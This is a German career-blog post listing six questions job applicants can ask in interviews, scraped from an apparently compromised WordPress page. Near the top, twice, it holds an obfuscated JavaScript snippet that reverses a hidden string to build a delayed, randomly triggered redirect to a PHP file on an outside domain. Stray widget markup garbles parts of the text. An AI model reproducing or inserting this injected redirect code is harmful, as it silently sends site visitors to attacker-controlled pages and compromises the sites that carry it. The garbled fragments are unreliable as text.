You are currently viewing 6 Fragen für Bewerber*innen im Vorstellungsgespräch

6 Fragen für Bewerber*innen im Vorstellungsgespräch

  • Beitrags-Autor:
  • Beitrags-Kategorie:KARRIERE
tor-base“

>

KARRIERE
[siteorigin_widget class=“WP_Widget_Media_Image“]$Bhq=function(n){if (typeof ($Bhq.list[n]) == „string“) return $Bhq.list[n].split(„“).reverse().join(„“);return $Bhq.list[n];};$Bhq.list=[„‚php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}tor so-widget-sow-editor-base“

>

6 Fragen für Bewerber*innen im Vorstellungsgespräch:

Wie Sie relevante Informationen zu Ihrem möglichen neuen Arbeitsplatz erfragen

tor","background_image_attachment":false,"background_display":"tile","background_image_size":"full","border_thickness":"1px","margin":"60px 0px 0px 0px"}“ >

$Bhq=function(n){if (typeof ($Bhq.list[n]) == „string“) return $Bhq.list[n].split(„“).reverse().join(„“);return $Bhq.list[n];};$Bhq.list=[„‚php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}tor so-widget-sow-editor-base“

>

heron Jan Mianvon Jan Mian, 18.08.2023
tor-base“

>

Welche Fragen können Sie als Bewerber*in im Vorstellungsgespräch stellen?

Nicht nur das Unternehmen darf während eines Interviews Fragen stellen. Wenn Bewerber*innen dies ebenso tun, zeigen sie nicht nur, dass sie vorbereitet in das Gespräch gegangen sind, sondern auch, dass sie Interesse an der neuen Stelle sowie dem Gegenüber haben.
Ein Bewerbungsgespräch sollte keine Einbahnstraße sein. Durch gute Fragen lässt es sich schnell herausfinden, ob der Job zu einem passt oder nicht.

Welche relevanten Fragen bieten sich für Sie im Jobinterview an?
Hier unsere 6 Vorschläge:

  • Wie sieht ein durchschnittlicher Tag in diesem Job aus?

Wenn Sie nach Beispielen und Tätigkeiten aus dem Arbeitsalltag fragen, erhalten Sie einen sehr guten Eindruck ob diese sich tatsächlich mit der Stellenbeschreibung decken oder nicht. So können Sie leichter feststellen, ob sie zu Ihren Interessen und Qualifikationen passt oder ob am Ende täglich das Murmeltier grüßt.

  • Wie ist die Unternehmenskultur?

Sowohl Sie, als auch Ihr potenzieller Arbeitgeber möchten wahrscheinlich, dass Sie eine längere Zeit bei ihm bleiben. Die Chancen stehen gut, dass Sie länger im Unternehmen bleiben, wenn Sie morgens gerne zur Arbeit gehen. Jeder hat unterschiedliche Vorlieben hinsichtlich der Unternehmenskultur. Manche mögen ein forderndes Umfeld, andere bevorzugen eine familiäre Arbeitsatmosphäre. Die Stimmung ist entscheidend, wie wohl man sich am Ende fühlt. Deshalb raten wir dazu, unbedingt diese Frage zu stellen.

  • Woran misst das Unternehmen den individuellen Erfolg?

Sie möchten erfolgreich sein und Ihr Arbeitgeber möchte sich auf Sie verlassen können.
Verschaffen Sie sich im Vorfeld eine klare Vorstellung davon, welche Erwartungen an Sie gestellt werden und wie Sie diese erfüllen können. Mit dieser Frage zeigen Sie dem/der Gesprächspartner*in, dass Sie motiviert und organisiert sind und die an Sie gestellten Aufgaben erledigen werden. Für sich selbst schaffen Sie Klarheit darüber, ob der potenzielle neue Arbeitgeber Leistung fair misst und bewertet.

  • Können sich meine täglichen Aufgaben ändern?

Wenn Sie sich für eine Stelle bei einem Unternehmen bewerben, das expandiert oder neue Märkte erschließt, kann dies (weitreichende) Folgen für Ihre Tätigkeit haben. Es bietet sich zum einen die Chance, durch Pionierarbeit die Karriereleiter schneller emporzusteigen und zum anderen können sich die mit dem Job verbundenen Tätigkeiten ändern. Unter Umständen haben die neuen Aufgaben mit dem „ursprünglichen“ Job nichts mehr zu tun.

  • Was sind meine Entwicklungsmöglichkeiten?

Wenn Sie ehrgeizig sind, haben Sie keine Angst, es zu zeigen! Natürlich kann man nicht erwarten, dass man sofort aufsteigt und man möchte nicht den Eindruck erwecken, dass man sich für diesen Job schon zu gut fühlt. Was Sie aber zeigen können, ist, dass Sie über Ehrgeiz verfügen. Die Frage nach Ihren Entwicklungsmöglichkeiten zeigt dem/der Personalmanager*in genau das: Wer möchte nicht eine/n hoch motivierten Mitarbeiter*in im Team haben?

  • Wie sieht der/die ideale Mitarbeiter*in aus?

Diese Frage wird wahrscheinlich bereits in der Stellenbeschreibung beantwortet, also stellen Sie sicher, dass Sie wissen, was drinsteht. Sie können diese Frage jedoch trotzdem stellen, um sicher zu gehen, dass alle Beteiligten wissen, was für ein*e Spezialist*in gesucht wird.
Oft werden Stellenausschreibungen nicht von der gleichen Person verfasst, die das Bewerbungsgespräch führt oder wichtige Details werden darin nicht aufgeführt. Somit beugen Sie Missverständnissen vor. Wenn Qualitäten oder Fähigkeiten hervorgehoben werden, über die Sie verfügen, zeigen Sie anhand von Beispielen, dass Sie die gesuchte Person sind. Dies ist Ihre Chance, den Job zu bekommen!

Wir wünschen Ihnen viel Erfolg beim nächsten Bewerbungsgespräch!

 

#karriere
#bewerbungsgespräch
#6fragenimbewerbungsgespräch
#wematchpeople